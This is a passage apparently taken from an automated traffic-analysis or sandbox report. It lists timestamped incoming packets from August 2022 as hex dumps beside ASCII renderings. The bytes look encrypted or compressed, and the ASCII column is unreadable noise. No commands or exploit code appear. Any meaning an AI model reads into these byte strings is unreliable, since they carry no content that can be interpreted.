6d f3 36 02 e0 d4 43 2d ac 8c 46 c4 dc 34 4e b5 9a 4d 85 72 a2 b3 19 d7 9e 48 04 08 0e 3a 81 c3 2e a2 0f 63 da 04 98 de b9 b7 3e 7d 06 61 f5 67 0a d0 2d 53 c7 69 7d 69 4a 47 f0 f7 50 93 5e 00 e8 6c 91 16 57 af Data Ascii: ojCtluk4>6hUr#BYm2[?N%IE@aPJZ0;6AGjsw:`R0@@b7 eUrNx? ^`</O_1Ev.A6_yX%krAm6C-F4NMrH:.c>}ag-Si}iJGP^lW
2022-08-05 09:32:58 UTC	183	IN	Data Raw: 27 79 84 af ab fc 2c 92 79 ef d5 49 25 03 bb 15 9b 50 27 56 f0 ad d7 59 71 ba 05 01 f2 be 4e 44 f8 45 af e9 51 e7 e6 64 51 96 95 f7 cd 99 a3 0f e8 5d 29 c3 fd c7 56 89 1e 70 6f df 70 a3 69 15 dd 38 18 9c 4e 2a f3 7f a0 4a 60 5c 20 2d fa 86 27 3e 61 ce ee 00 f0 6d 7f b5 8f 08 10 54 55 3e 0a 91 aa e0 93 d3 c4 4e 57 dd e4 1d cc 1b 85 e1 f4 30 ba e3 0f cf 04 eb 3a 7a 65 78 d0 aa 18 76 ef 1e ab a3 38 d5 8c d4 06 fc 07 a1 c5 dc 85 c9 59 ba ea 0e 10 57 58 5e ce 94 ab 4d 63 f8 4f d5 73 3a 2e b8 01 ee 13 87 b4 f4 b6 a1 15 65 da e6 c4 b1 e7 69 16 43 a7 f5 4c 5e 02 fa 3b d6 23 84 42 53 b9 bc 76 fe 00 bd f3 86 89 32 cf 59 7a bc 32 a1 65 cf 92 3e ac 92 40 73 94 95 fb 95 0f 30 78 de a6 96 a4 80 2e 33 c5 bf d1 6d c7 a4 b9 a8 8d ac 0a 69 d9 2b bc 81 f2 34 e6 ba 92 13 38 Data Ascii: 'y,yI%P'VYqNDEQdQ])Vpopi8N*J`\ -'>amTU>NW0:zexv8YWX^McOs:.eiCL^;#BSv2Yz2e>@s0x.3mi+48
2022-08-05 09:32:58 UTC	184	IN	Data Raw: 74 b8 87 36 e4 d7 eb 6e 09 a0 13 b9 23 d4 18 56 8a 13 8d b1 e1 20 68 ca 11 cc eb 30 4b da 27 19 6f 18 8e 1a 58 aa af 9d 52 ab 44 9f d6 de 7c f0 c8 4a 51 9c 8f 04 c0 ac a1 6f ef 5b c1 c5 42 d9 25 cd 5d 76 28 0a 3f 2c d6 3b f3 c4 14 ea 55 a8 2b 81 c3 ef f1 63 93 4f a1 62 6b 1d 3c 59 e8 cf 87 69 39 70 5f 9f 3e 5a 15 9e ea 49 20 21 c1 db 8d 21 42 e8 40 21 ca ac cc a4 1f 9b fc 9b 8c ae f6 55 73 b7 dd 06 87 0f 50 87 c5 a8 51 32 c7 bc fb b5 23 95 ef a3 40 30 c9 3a f6 44 d0 33 a1 8c 5b 82 d0 e1 16 55 8d ff 1e ae 9a aa 44 1b b0 86 bb f3 1d c7 32 bc 77 4a cd 75 b9 3a 33 2e 21 a3 33 ca 88 05 58 1e 26 0f 92 aa 39 17 bc e8 4e 90 66 eb ac 7e 80 e3 2a 20 a6 51 4a f5 27 4d 08 fa 3e 9d 35 c0 ad 65 a7 25 97 26 6b 2f 38 62 b7 39 b2 9b 60 00 e7 43 0b 28 76 4c 10 32 e8 25 d8 Data Ascii: t6n#V h0K'oXRD\|JQo[B%]v(?,;U+cObk<Yi9p_>ZI !!B@!UsPQ2#@0:D3[UD2wJu:3.!3X&9Nf~* QJ'M>5e%&k/8b9`C(vL2%
2022-08-05 09:32:58 UTC	185	IN	Data Raw: 20 70 24 37 3d 43 e3 6f 70 4c ac 23 22 eb fa cc 7a 5f bb d8 5e d5 4d 7a 5b e4 e3 d4 45 33 fb 85 2d f5 b3 70 56 7e b3 f4 6f 0d f0 8c 2d 5f cf 40 42 ea c5 07 65 fa 23 0f 8b c2 de 5b 0b ee d6 96 3e 6c 76 40 b0 78 e6 7e 5b 7d 0f 23 16 2b 39 bb e0 70 48 83 07 29 72 e9 f1 fb af aa f7 84 01 75 e5 e8 0a ac a1 58 84 5c f5 ac 63 33 20 9a 78 78 14 2f d9 52 fa 13 c9 3e 1c 7d 5b 9d 86 b3 a4 c0 cc 9e 92 63 45 73 4b 50 a0 43 27 a7 e1 89 2d 78 b3 15 3b 25 88 a9 b0 d0 88 ec 39 00 74 0c 2f 6b 45 f1 4c 2e 3a fd c2 50 f9 0e 79 0a 62 e7 a5 61 1c c6 8c 20 77 2a aa 11 f2 6b bd ea 08 41 4d d3 38 d9 85 cb 70 0e 62 97 97 fe 42 38 43 42 83 7a eb 7c 31 f9 08 b6 4f 45 ed 5b b8 51 d9 e4 9f a8 2a 74 7f 9d 6b 32 91 36 dd 20 d6 a3 39 f0 c2 6c 93 74 e2 01 0a fc 99 d2 5d 7c d5 1e b9 35 f9 Data Ascii: p$7=CopL#"z_^Mz[E3-pV~o-_@Be#[>lv@x~[}#+9pH)ruX\c3 xx/R>}[cEsKPC'-x;%9t/kEL.:Pyba wkAM8pbB8CBz\|1OE[Qtk26 9lt]\|5
2022-08-05 09:32:58 UTC	187	IN	Data Raw: 97 90 6f db a1 07 ca c9 d3 b2 51 8d 80 9c eb b5 2a 25 d9 33 f9 5d 19 c5 ff ae 4e e3 7b d4 5f 39 5a 27 02 8d 4f 5f df 85 4f 79 6f 5e d1 f2 25 4c ee ee 1e 40 5e 30 69 e9 53 55 47 0e 1b 8c be 52 29 a6 4f 8d d0 ee c5 a3 e3 9a dd 3a 9c 44 69 a6 53 9b 73 eb 9e 07 42 ac ec 25 02 91 eb a7 2f be 8a 65 ae f0 69 d5 1b 73 73 a3 73 2e 27 5d 8d df 6d ce 3a 8a 51 72 b7 a8 5d ba 53 f7 82 fe ec 69 fb e3 d6 b6 11 25 1a 7c 31 e0 03 28 1f 47 13 b8 b6 53 85 8c 76 72 fa 40 17 57 72 b8 c9 92 ab c3 4b 65 91 fb 79 63 e0 47 af b4 65 a9 cc bd 94 78 d3 bc a6 29 c1 3e 20 9e ea a5 67 3e 85 0a 2f 83 d5 b3 ad 64 16 3e 1a fb 6c da 3e 54 4f 0b 30 1c 66 31 ff 50 fc c5 db 39 fb 1d 5f ce c7 75 20 45 cf df 11 c0 09 b4 02 eb b6 ee e2 b6 dc 4f e2 3b ef 78 0c 23 84 6a 1d fd e7 45 8a 73 ad c2 ce Data Ascii: oQ*%3]N{_9Z'O_Oyo^%L@^0iSUGR)O:DiSsB%/eisss.']m:Qr]Si%\|1(GSvr@WrKeycGex)> g>/d>l>TO0f1P9_u EO;x#jEs
2022-08-05 09:32:58 UTC	188	IN	Data Raw: 71 ad cf eb 95 ac f9 d1 38 cc c8 51 2c 18 18 b5 15 76 60 fa 42 1a 76 c4 84 dc 65 40 ae 5a ff b5 ba 73 81 cf 75 1b e2 69 cd 86 83 5c c2 b6 6c 7d 1b 49 e2 54 cf 5a c0 f1 ee 5a bd 67 f5 dd 44 19 23 9f d6 3a ed b2 3d 61 63 29 2a 20 33 b4 30 5e bf 0b dd 77 5b bc 2d d1 3a 1f 22 4e 27 e2 f4 6f c6 c6 74 69 de 59 00 c2 65 6b d4 80 c7 65 16 ca 98 f4 f9 55 d0 a6 5b 43 70 78 71 38 23 45 7d 75 ee f1 eb b5 69 ee a1 ca 2a a9 88 2f 64 2f 24 f9 f0 5d 82 16 b3 f0 72 bc d4 e6 08 24 51 3a e3 b8 90 aa 6c a0 33 41 d0 50 2e cc a9 8a f3 cb 3b 91 a8 9a 60 01 b1 e2 2b 25 8c 67 6f 77 c7 88 79 b4 f7 1b 73 2e 76 c4 e3 27 46 01 07 4c 00 ac 3a 83 f9 32 25 b2 63 e2 66 66 47 2e e4 63 4e f9 de 39 ea eb 9b 1a f0 84 be 31 28 0d d7 ce 1b 97 40 a8 68 f6 c8 d6 4e 1e 14 42 73 65 10 b6 e1 1f 76 Data Ascii: q8Q,v`Bve@Zsui\l}ITZZgD#:=ac)* 30^w[-:"N'otiYekeU[Cpxq8#E}ui*/d/$]r$Q:l3AP.;`+%gowys.v'FL:2%cffG.cN91(@hNBsev
2022-08-05 09:32:58 UTC	189	IN	Data Raw: 75 9d f3 12 db f6 b1 c8 92 a1 30 b2 ba 0c c7 4c ee ed e4 b6 49 5d db 55 d4 78 d6 e7 3d c9 09 fd 07 48 f7 ce 9c 15 d0 d9 cc 8d 20 f0 63 3f af 37 8a 51 4e 0f 22 4c ff 3b 9a 10 e7 fb a0 e3 21 c6 70 43 fe be 5f 85 e2 7e 40 fe ee 61 36 61 71 1d ce a8 bf 7b 84 b7 08 34 ba aa f6 62 9c f5 e7 59 b8 5a 92 43 3b cb 7c 4b b1 fd 9b bf af ff ee b6 11 d8 85 c7 bb 37 ed bd d2 20 d9 35 41 9d bf cb b7 e2 f3 b9 45 9e 36 49 83 c5 88 f1 02 c9 90 78 7d 0f 75 be ff 22 d9 de 0c a5 de f8 8a 1c a8 14 74 90 a8 64 80 b4 12 28 bd b0 e9 b1 c7 82 01 a4 e8 ef 5d a4 63 89 d1 68 0a ed cb 63 a3 f6 c7 a3 a7 61 2e e6 d7 b8 3d 52 af 52 84 cd b9 7b b9 89 02 53 10 9f 14 fd 18 94 31 6b 95 28 d1 35 90 f7 53 f7 3f c9 55 15 2d 81 68 4f 08 b0 8e 0d 1a f6 18 85 5e 2c 35 9f 74 21 70 0b 04 3a c7 d8 da Data Ascii: u0LI]Ux=H c?7QN"L;!pC_~@a6aq{4bYZC;\|K7 5AE6Ix}u"td(]chca.=RR{S1k(5S?U-hO^,5t!p:
2022-08-05 09:32:58 UTC	190	IN	Data Raw: 90 44 c0 ed cf c3 bc 47 6c 8d 0a 1a 08 9d e7 ba 31 27 a4 e9 ff 75 74 1a 89 27 4e c1 9d de 2b 73 b6 d8 cd 26 03 6a 65 0b 44 41 3d 55 c3 4d 73 d3 6b 69 93 ca 0c b0 88 99 55 9d 1c ee 9e 6e b0 37 1d 92 d6 7f b4 9b 12 d2 50 95 58 a3 81 e5 a4 56 f7 36 c9 5b 6c e0 9e 69 3a 3b 86 b7 14 d2 31 94 5d a9 15 e8 a2 66 81 b7 eb 7f fd f5 d8 7e 90 bb 61 55 49 dc 74 1f 1f 6d 23 3d 18 70 69 12 13 56 05 09 8c d6 cf 35 50 d2 86 78 6a 47 5e 5a d6 4e 68 02 46 87 a2 65 4c 71 6e e3 97 4e d1 47 39 e9 ef 65 ab 5e d7 5e 18 b6 28 9c 66 56 c9 9b 58 42 e0 0a b2 3f f2 dd 49 32 18 8b 11 7b 28 6d c4 e4 43 f1 1d a5 5e 8a 41 a9 99 b4 a1 84 91 5d b0 88 73 d1 64 3f 67 3a e0 9a 01 a1 c8 ed 25 03 14 41 30 fc 4b 12 8e d5 15 18 14 e6 ac 43 58 51 8b 31 fa 56 ec 2f fe b9 77 b4 62 ea 6e f2 eb ad 92 Data Ascii: DGl1'ut'N+s&jeDA=UMskiUn7PXV6[li:;1]f~aUItm#=piV5PxjG^ZNhFeLqnNG9e^^(fVXB?I2{(mC^A]sd?g:%A0KCXQ1V/wbn
2022-08-05 09:32:58 UTC	192	IN	Data Raw: c1 f8 f6 51 32 10 0a 2c 96 d5 a8 ee c3 65 56 42 4c 28 a6 06 dd 72 65 a9 b0 5b cf 18 6e 42 2e 2c 3e 31 a1 63 f3 7a f9 12 7e 83 11 59 82 6b 35 88 aa b7 c8 27 8e 95 a2 e3 0e 0e 92 43 ef a5 b2 0b 5a 66 a0 9c 0b 98 b9 3c fd 11 62 5b 54 87 35 70 ac 54 bb d1 89 9f d0 0a fc f1 77 48 37 91 87 65 f7 4d 6b 36 52 29 0d 1d f5 5a 5b 88 a0 82 ef d8 44 55 69 9f 85 e7 44 44 a7 96 e7 99 ec 6f 03 a5 40 81 a1 03 b6 b6 a6 e5 af ca d3 54 10 4c b0 84 72 a5 7e d5 43 d3 44 0d 55 0c 14 d8 e0 a8 65 2d 48 04 32 0d 15 64 dc d2 76 6e 81 60 89 8e c3 d0 66 80 3d 09 b1 8d 72 de 97 ed 3b 91 58 04 5a 3b ec db 3f d3 c5 b5 f5 cb cc e0 b9 65 7a a7 2d d9 f2 f4 64 ba 22 82 d3 02 52 b2 95 5e a4 4c cd 1c 94 5b 1e b7 0c 94 2b 61 f7 f7 46 17 55 f4 ee 73 59 0a 8c 16 3a 28 6b 73 76 1f 8b 3d d3 78 50 Data Ascii: Q2,eVBL(re[nB.,>1cz~Yk5'CZf<b[T5pTwH7eMk6R)Z[DUiDDo@TLr~CDUe-H2dvn`f=r;XZ;?ez-d"R^L[+aFUsY:(ksv=xP
2022-08-05 09:32:58 UTC	193	IN	Data Raw: 06 3d f6 18 3b 25 20 78 41 04 a8 93 dd b3 27 ca c1 65 ba 55 b0 d9 9e d6 71 09 5c dc d4 e4 70 f8 ab 69 a9 1b bc 35 b0 24 48 64 7d 0e 7f 74 87 2b 02 37 e8 75 7f 3e 1d 93 1d e5 4e da 6f 49 ba 93 b4 a2 a7 ef cb 77 d1 10 4e a7 8d 67 01 12 0b 6d 93 c0 fc bd 41 3b f3 b6 0a 42 ec e3 b4 2d c0 5d 80 f4 8d 4b 7c 24 e1 e2 ed 6e 38 11 35 05 fa 7f 6d 51 94 a0 e1 ce 32 79 e0 c7 0d f3 1b e0 b9 60 cc c8 62 53 78 6a 60 e4 4d 7e c9 fd 60 d6 88 01 b0 55 a9 5e af 11 8d 24 45 3d e0 44 73 ff 4e c2 64 d5 a2 17 09 37 f0 10 6c 77 de 78 f3 7f 53 ba 17 31 c7 e5 41 de e6 f8 e9 c5 b7 a0 c9 1c 66 69 c5 a4 0d 4e fb ea d8 4f b2 d0 4f 45 a9 ca 55 ad 12 2b 33 a8 38 3b 9f 5d 19 aa 57 c3 09 d0 f8 89 ab 21 1b 34 77 00 ff 48 87 99 bc b8 b4 e5 4a 7f 4b ef 1a 2a 40 d9 1a 5e 1f 88 84 cd 5d 05 7b Data Ascii: =;% xA'eUq\pi5$Hd}t+7u>NoIwNgmA;B-]K\|$n85mQ2y`bSxj`M~`U^$E=DsNd7lwxS1AfiNOOEU+38;]W!4wHJK*@^]{
2022-08-05 09:32:58 UTC	194	IN	Data Raw: 2a 81 06 4c 8a 89 06 d5 2a 9b 75 50 bd 4f 1c 9b 1a 0a 97 a4 13 e0 6a 3d b5 8d 33 1a e6 ca e2 9c c1 db 29 4b df c9 a6 dd 82 b6 0f 38 ee 9a da 21 ea 2a a1 69 09 e1 79 47 9b b1 a7 83 01 36 ee 8a cd 84 28 de 0f e7 d8 3d d8 0a 0f 89 1e 0c 09 74 fe 50 dd ad 4a 6c 98 f3 ef 17 c7 84 68 b2 a5 82 50 5d 73 3a cc 58 4f 9e 41 19 92 d2 e2 f6 4d 8d e3 f2 8e c7 61 1f 73 60 94 12 63 59 af 65 71 da be 21 ed 35 e9 2f a2 17 08 b6 19 0f 23 c6 e4 e2 16 79 60 6b 49 4d cf 85 0b 25 e5 5e f5 00 8e 79 e0 23 93 88 de 6b ea cc 58 00 86 3f 16 5d 70 18 27 a6 10 bd 80 b1 6d 41 87 1a 2a b9 2f 24 10 c9 dc a4 b7 da c0 61 37 a6 18 74 ad 1b 77 bf e2 3a 18 43 b4 11 53 f6 33 23 26 95 f3 3c e3 b8 85 86 d1 54 bc 2b 7c 0a c2 08 88 62 9c 14 b2 cc ba bc 7b 67 d1 44 6c 6e 9b 89 3d df d6 87 03 e4 7f Data Ascii: LuPOj=3)K8!iyG6(=tPJlhP]s:XOAMas`cYeq!5/#y`kIM%^y#kX?]p'mA/$a7tw:CS3#&<T+\|b{gDln=
2022-08-05 09:32:58 UTC	195	IN	Data Raw: 67 15 d0 44 a5 f1 00 83 d4 9a 8d bd 85 fe fa 19 62 d3 45 9f df 81 66 44 cd 12 d0 8d 32 16 ab b2 99 6b 9a f3 31 d8 ab 09 d5 f1 96 be 6d fb dc 0e 6f 08 a6 2f cc e6 2f 22 dd 13 90 0b c3 e7 82 a4 b5 35 a5 5a 7e dd 1c e6 7f ba 0f d3 cd 0b d1 d7 a3 76 0f 86 07 92 fa e2 3b d3 ac b5 ef 32 de 37 6c 3f f1 6b 52 d0 db 58 8b 57 78 82 e9 6b b0 d6 80 2d b1 ce 00 14 9e a3 39 16 ab bd 2f de dd c6 e1 3b c6 bb dc 61 b3 ed ac db 65 33 81 8d 61 04 f4 ea b0 48 54 8e ca 59 ab f6 db 72 a3 40 b6 6e 0a 10 c4 fc cb a1 73 b8 4f f9 68 0c 53 b2 30 ba 0f b7 ae 1b 92 a3 b3 f1 38 32 63 80 c5 fd 05 96 5f 87 7f ff 92 a5 48 ad cb 43 9a 48 83 14 59 40 bb dd 41 bc 9f 0c 61 50 5d eb d3 fe 61 aa 4a fd af 99 6b 77 6e 1b 8d 31 fa 42 aa 9e 84 b7 eb 5d e9 a5 df c0 ed 70 2c 34 cd 44 5a 80 3d 7b 70 Data Ascii: gDbEfD2k1mo//"5Z~v;27l?kRXWxk-9/;ae3aHTYr@nsOhS082c_HCHY@AaP]aJkwn1B]p,4DZ={p
2022-08-05 09:32:58 UTC	196	IN	Data Raw: 6d 8c 64 90 e4 94 44 80 47 cc 57 bc 59 04 a0 f0 dc e8 50 b6 90 a9 d5 05 3e 48 00 8f a6 0b f4 4f 48 1f 44 d2 9a 92 e9 65 36 f4 f0 9f 46 34 01 ba aa a7 42 f4 8e 30 ed 0d c7 29 18 c1 e3 08 2f 7a 84 de 0f e8 12 d9 96 bd 2a 8b e1 d1 75 bd bb 11 50 b6 6b 2e 29 df c3 af 18 f9 7e 2a 67 2b 9b 94 af b5 84 7a c0 a0 1f 54 dc 83 0f 84 68 e2 d1 a2 77 43 dc 2c b2 ec 66 c3 63 13 03 2d 51 d6 4a 36 17 19 3e 7d bb 9f a3 b0 65 44 1b 84 10 3c be 14 b1 fa 81 93 49 a8 4a 07 f9 c2 42 8b c0 1a 13 4c f7 f2 bb b2 83 a8 26 4d d9 a2 e7 2c 6b 6b e6 c9 be 6e 2f dd c8 ee df 32 8c 72 ae e4 fa 50 96 6e 07 09 93 17 c0 c8 7c 1e 8b c1 dc fb 35 e1 42 ba ef d6 74 3f 5d 32 b5 49 ee e4 e0 0d 21 85 86 14 96 65 cd d8 72 cd 8b e8 c7 31 d9 0b 29 09 5a 9a 40 b1 38 65 c8 42 aa 1b 6c 89 77 49 f0 d7 ed Data Ascii: mdDGWYP>HOHDe6F4B0)/zuPk.)~g+zThwC,fc-QJ6>}eD<IJBL&M,kkn/2rPn\|5Bt?]2I!er1)Z@8eBlwI
2022-08-05 09:32:58 UTC	197	IN	Data Raw: 86 a0 5b 7f 3e 8d 69 9a a6 55 26 20 74 71 e3 d6 68 cf 6d 7d 2b d2 a0 c0 fb 5a a4 76 75 2a 47 eb 7e 0f d2 08 b0 60 82 7c d5 11 aa b1 2d a0 52 1b 9f 17 37 45 be 87 9d 96 05 13 2a 3a 52 dd 50 e1 2c 20 3f e6 14 2a 7b ea 72 ac 67 fe b4 95 80 e8 ac 9a e5 59 de ba 1e 89 00 ce a5 e0 92 1f fb 7c eb 89 39 03 a2 8b b5 c3 94 9a 83 86 25 ac 46 e7 3b 9c 79 19 0e 13 b8 53 dd 39 7e d5 92 54 b2 b7 f9 bf ac 37 c4 81 d4 72 bb 07 8d bb 27 36 92 42 ca 41 11 4e 95 af 63 20 54 b7 f2 5f d0 ec d6 83 2a ba 92 36 7e f7 a3 60 96 22 58 2b 58 e4 d9 4b 65 35 e0 d3 51 8b bf 70 fd a8 4f 1a 3c fc 1f f6 e4 48 91 58 e1 22 5e 30 03 49 8c 9d 2f 72 73 f3 99 06 17 47 c6 e6 ae 80 6b 6c d6 08 d9 65 11 97 b9 24 c7 54 d3 9e 28 9f 93 c0 3b d1 a4 e1 23 46 96 d2 d6 e3 84 4d 64 10 df 04 cf 55 6b f4 5d Data Ascii: [>iU& tqhm}+ZvuG~`\|-R7E:RP, ?{rgY\|9%F;yS9~T7r'6BANc T_6~`"X+XKe5QpO<HX"^0I/rsGkle$T(;#FMdUk]
2022-08-05 09:32:58 UTC	199	IN	Data Raw: 15 9f 34 bf 4a 2d 48 87 68 f8 02 56 96 b4 08 eb ab b5 15 22 d0 b1 aa 03 22 27 ff 48 e6 d2 77 0e b0 6d 00 49 31 0c b1 d8 f2 5c ae 0e 1d 93 c3 9a ad ae 1f e5 9c fa 49 fc 01 eb eb db 6c fb 66 79 41 e0 c1 71 5e 33 48 3e bd f3 1a 3b 77 bb 54 92 05 77 5a d9 56 e6 35 cf d4 5e bb b2 ec 82 8d 51 bf 45 4d fc fa 91 2b 72 c7 61 8b 0e 80 32 cf a6 78 7a bd 52 41 32 50 25 ec 60 28 12 4f 3d 64 53 3f 6d 28 5a 87 75 aa da d2 a5 f6 b0 dd a2 a3 83 72 37 2d a3 d3 4a 47 2d 38 07 0d 54 3f 4f 3d 10 d5 95 7e c4 05 fa 82 14 ad 7d 27 df e8 94 7d ba ba 67 d6 95 88 42 b8 ad d6 26 2a f6 dc 54 c7 1a 1d 18 82 8a 6e 98 c0 da fa 56 1f 37 42 eb e6 5e c8 b7 71 de 1c 3b ac cc be f4 44 7b 1b a1 31 8c 37 26 1b fa 1a 30 eb 27 61 e8 8c 31 f5 47 63 71 7e 16 5e 76 ce bf 5c 0f a4 31 52 2f c3 aa 2b Data Ascii: 4J-HhV""'HwmI1\IlfyAq^3H>;wTwZV5^QEM+ra2xzRA2P%`(O=dS?m(Zur7-JG-8T?O=~}'}gB&*TnV7B^q;D{17&0'a1Gcq~^v\1R/+
2022-08-05 09:32:58 UTC	200	IN	Data Raw: 93 bd 29 bd 6c 7a 97 21 8a 20 28 33 bd 47 03 89 46 04 53 c7 a1 84 ff 27 04 76 a8 98 69 b5 60 b3 e9 78 f1 02 a7 23 3e a9 d0 4f 1d 35 3f df 8a dc ce ac 12 b0 85 4f a4 c2 40 05 41 be ed 6d b8 8e b4 c8 ce 48 0e a9 a3 82 99 de cc c1 89 48 4c 2a be 16 60 6f 36 2f 12 a8 ce ac f4 16 42 d9 8d fc e2 ea 31 0b 84 62 86 55 89 fe 1a 0e ed 3d 76 5d cb a4 8c 7b a8 34 67 cd ab b6 6d f1 a1 f8 37 43 36 fd 48 05 e3 d8 02 17 19 80 cf 7a 55 b6 e5 bf 9b 86 22 ee 49 53 e3 2e 16 06 9f 16 82 9e 5b 7d fd e1 62 71 49 b2 6e 6b e3 3e 10 c6 ec 0c a4 9b 5a 29 cd 6e de 48 2b aa 9a 28 e3 e0 a7 86 a0 59 e3 c0 e6 eb ab cd 66 91 13 15 f7 b8 5d 87 08 c9 28 a1 cd 02 12 bd ea 6f 49 24 cb ce 88 79 56 b1 9b 3c e5 6e af 03 be 7b fc 1e 15 8a 37 14 c7 51 19 9a 05 f7 f1 33 ae 5a 14 02 20 c2 d4 f6 5b Data Ascii: )lz! (3GFS'vi`x#>O5?O@AmHHL*`o6/B1bU=v]{4gm7C6HzU"IS.[}bqInk>Z)nH+(Yf](oI$yV<n{7Q3Z [
2022-08-05 09:32:58 UTC	201	IN	Data Raw: eb a8 25 29 3c 9b 43 5b 1e 62 a3 fb 00 25 e1 60 7f 04 47 0a f7 23 17 e3 d2 a5 c3 f9 d2 14 87 3a 1d c0 ae eb 38 51 2d 90 b1 95 75 45 df 23 76 70 53 6c 86 63 7b 10 5c c2 7a 87 9b fd ec c3 ff 6b 22 7f 83 4e 76 be b0 37 1e 75 c6 c7 94 02 6c 8e 83 8b 15 14 dc 0a 48 5c 19 c2 e8 8d 08 ba dd fd ff f9 1f 35 d9 83 12 1a ca 55 74 29 76 88 d6 fd b7 90 14 05 77 6a d5 3a f8 a8 89 16 0c f3 c3 a1 12 b8 c4 f0 bb 80 1b c4 50 9d 1a f3 8b 1e 6f 22 df 91 7c 63 41 3f 1f 7d 08 d4 50 0b 1d 3d 2c a0 a8 86 15 ae 64 71 a5 51 5c e0 e5 1b 20 29 59 80 ce 77 6a d0 b8 96 37 64 2a 3e a3 4f 43 44 b3 7f 5d bf 1d ab 86 b6 7c b8 bd 63 12 53 26 d9 c4 f6 bc de 42 c9 3b 67 6d c7 a3 1c b9 c8 a3 9b ab 85 ef 81 82 d6 e3 53 bf a8 9d 55 ef cd 80 90 ef 9f 1b 68 b4 06 05 ed 3f 28 08 96 4b ed 6d da ee Data Ascii: %)<C[b%`G#:8Q-uE#vpSlc{\zk"Nv7ulH\5Ut)vwj:Po"\|cA?}P=,dqQ\ )Ywj7d*>OCD]\|cS&B;gmSUh?(Km
2022-08-05 09:32:58 UTC	203	IN	Data Raw: b5 de 1b 5a 32 ce 8b 98 8b f6 5e 83 64 20 81 7c 35 ed c1 b5 f0 2d 42 59 18 90 c6 d6 f7 ba 97 09 03 9f 21 3b 08 67 53 d6 8d 91 20 56 3f 03 24 41 7a d2 38 b2 1e 15 60 b1 48 6c aa 4c d2 8e e6 78 36 fb c2 b4 bb f0 66 42 d7 8e bc 10 70 7b ab d7 fc 9c bd 7b 3f 25 9c e0 62 bd d5 68 27 09 6b ed 74 b4 e3 43 82 f3 b8 49 f3 70 ce 94 fc ee 88 b4 4e 92 01 63 3d 19 4d 26 28 c1 b6 51 5c 38 92 05 6c f4 56 67 67 b4 b5 7d 57 f8 18 54 8d 15 8f 92 c0 86 e0 64 5f 24 fb d4 61 39 09 f4 41 0b e0 f8 2a d0 2b 82 2b e9 81 f9 69 9a 7d d5 f5 6e 1c 76 0c 30 f0 bb b0 cd ac 57 91 f2 4c 47 27 f1 78 a8 e4 29 9c d9 9f 36 a0 04 2a d3 d4 be 8b 1b d1 92 63 3a ef ce 25 20 fc 85 ec db d7 1a 13 d0 45 b7 6d 11 42 35 79 35 0b d7 44 7d b5 f9 5e 99 7c c4 f9 3a 0d 84 87 07 b7 b3 ef 4b 6c 30 24 65 42 Data Ascii: Z2^d \|5-BY!;gS V?$Az8`HlLx6fBp{{?%bh'ktCIpNc=M&(Q\8lVgg}WTd_$a9A++i}nv0WLG'x)6c:% EmB5y5D}^\|:Kl0$eB
2022-08-05 09:32:58 UTC	204	IN	Data Raw: 79 f9 26 0e 75 31 69 9c 98 77 27 b1 c7 d9 67 83 72 53 bc cf 87 0f 3e 26 d6 81 63 e6 ee 1b 52 fb d6 05 1e 87 a9 90 e6 b7 85 ef 55 42 98 07 71 33 38 d0 b5 47 18 a2 64 dd 3c 68 8d 03 2f b1 a6 18 38 a8 84 a7 79 01 14 6c bc 11 19 3d f1 05 3e 05 71 08 3b c2 e9 99 42 05 90 b3 07 2d 3f 61 ae 28 7c aa 44 c0 0d 13 18 b1 82 ae b4 0a b0 40 11 c4 3a d2 ef 16 b0 c9 64 f3 f5 93 55 33 f4 a8 91 76 5d 64 95 47 90 5d fe 4c 74 cd bf b2 2b 4d 4b 35 dd 3c f6 d2 66 8c a5 57 e7 f2 35 0d 79 96 82 9c 40 15 8c 8d 67 3a 49 cf 35 a5 36 ee 0a 37 9e c6 cb 7d 00 99 d3 1c c1 1a 76 e3 3c b6 c0 ff 44 74 78 c2 a6 94 cf 84 cc f1 58 ef 3f 7f e4 00 a6 82 04 3a 45 f9 b5 af 09 9d d0 91 6b e5 7b 4e 86 9a db 3d af 53 35 2c a1 32 54 56 ca e3 69 6c bd d8 ad d0 2f 87 ad 9d 26 66 d9 31 78 6f 7e 3d b7 Data Ascii: y&u1iw'grS>&cRUBq38Gd<h/8yl=>q;B-?a(\|D@:dU3v]dG]Lt+MK5<fW5y@g:I567}v<DtxX?:Ek{N=S5,2TVil/&f1xo~=
2022-08-05 09:32:58 UTC	205	IN	Data Raw: 2f cf 12 dc 65 0e 1c 4b 37 c9 28 25 26 f3 e9 6c 65 98 c0 ac 93 87 13 97 cc 06 68 ae 62 65 6d f2 25 7d 78 05 92 b5 68 20 2a de 6b 9e da 95 d5 b0 41 4d e3 69 dd 8e 2d 26 10 e3 7e 6a 31 65 8c 6b 0b ce 4f 44 43 13 34 4c d7 53 c3 ce c5 e7 9b 5d 22 13 48 b1 d1 de b5 84 35 60 54 9c ea a1 b2 ca 4b 02 47 8e 51 13 0d d8 b8 3c 21 5f 3f 2f a6 0f e3 81 3c 42 87 0a ef a3 1a 24 dd a0 d4 65 db 5f c2 fb 42 bc 94 ba ff 4b 19 55 f6 b0 38 19 5a 8d f4 38 b3 c1 1e 48 21 f7 c8 f6 d0 ee 50 af 77 a1 2b 16 25 9a 93 04 7f c0 1c fd 44 47 4f a2 bd ba 23 f3 9e 20 c7 64 43 a5 c6 df c4 5c fc 7f 49 86 e4 6d a3 4a c3 9f ba a3 8d f4 2a ee 4f 12 95 ae f4 38 d5 61 5b 31 b0 47 86 74 e6 e8 84 d9 be fa 2a ac 06 de 75 5c 21 f7 b5 22 2e 69 ba 2a c1 a7 53 b2 72 63 d3 f7 30 10 2a e6 73 9c 2e 1d cb Data Ascii: /eK7(%&lehbem%}xh kAMi-&~j1ekODC4LS]"H5`TKGQ<!_?/<B$e_BKU8Z8H!Pw+%DGO# dC\ImJO8a[1Gtu\!".iSrc0*s.
